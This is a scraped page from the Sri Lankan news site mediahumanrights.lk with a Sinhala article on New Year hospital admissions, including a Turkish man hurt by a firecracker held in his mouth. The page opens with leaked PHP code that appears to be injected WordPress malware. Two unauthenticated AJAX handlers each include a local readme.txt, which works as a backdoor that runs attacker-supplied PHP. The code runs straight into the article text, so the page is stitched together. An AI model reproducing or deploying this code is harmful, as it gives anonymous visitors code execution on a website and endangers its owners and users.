if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } රතිඤ්ඤා කරලක් කටේ තියාගත්ත විදේශිකයා රෝහලට - mediahumanrights.lk
mediahumanrights.lk
Local News News

රතිඤ්ඤා කරලක් කටේ තියාගත්ත විදේශිකයා රෝහලට

නව වසර උදාවත් සමඟ සිදුවූ විවිධ අනතුරු හේතුවෙන් පුද්ගලයින් 500කට ආසන්න සංඛ්‍යාවක් කොළඹ ජාතික රෝහලට ඇතුලත් කර තිබේ.

කෙසේවෙතත් පසුගිය වසරට සාපේක්ෂව රෝගීන්ගේ අඩුවක් දක්නට ලැබෙන බව ජාතික රෝහලේ නියෝජ්‍ය අධ්‍යක්ෂ වෛද්‍ය සමින්දි සමරකෝන් මහත්මිය පැවසුවේ.

රතිඤ්ඤා කරලක් මුඛය තුළ තබාගෙන දැල්වීම හේතුවෙන් තුවාල ලැබූ විදෙස් ජාතිකයෙකු  ද ජාතික රෝහලට ඇතුලත් කර තිබේ.

45 හැවිරිදි තුර්කි ජාතිකයෙකු වන අදාල පුද්ගලයා මේ වන විට කොළඹ පෞද්ගලික රෝහලක ප්‍රතිකාර ලබන බව වාර්තා වේ.

නව වසර උදාවත් සමඟ වාර්තාවූ අනතුරු පිළිබදව වැඩිදුරටත් පැහැදිලි කරන ජාතික රෝහලේ නියෝජ්‍ය අධ්‍යක්ෂ වෛද්‍ය සමින්දි සමරකෝන් මහත්මිය.


(under the courtesy of adaderana.lk news web)

Related posts

මොරටුව විශ්ව විද්‍යාලයේ ඉගෙනුම් අත්හිටුවයි

Shiran Viraj

සෞඛ්‍ය අමාත්‍ය ධූරය වෙනස් කිරීමේ උත්සාහයක් තිබෙනවා – රාජිත

Shiran Viraj

දේශපාලන අර්බුදය මැද චීන දූත පිරිසක් නේපාලයේ හදිසි සංචාරයක

Shiran Viraj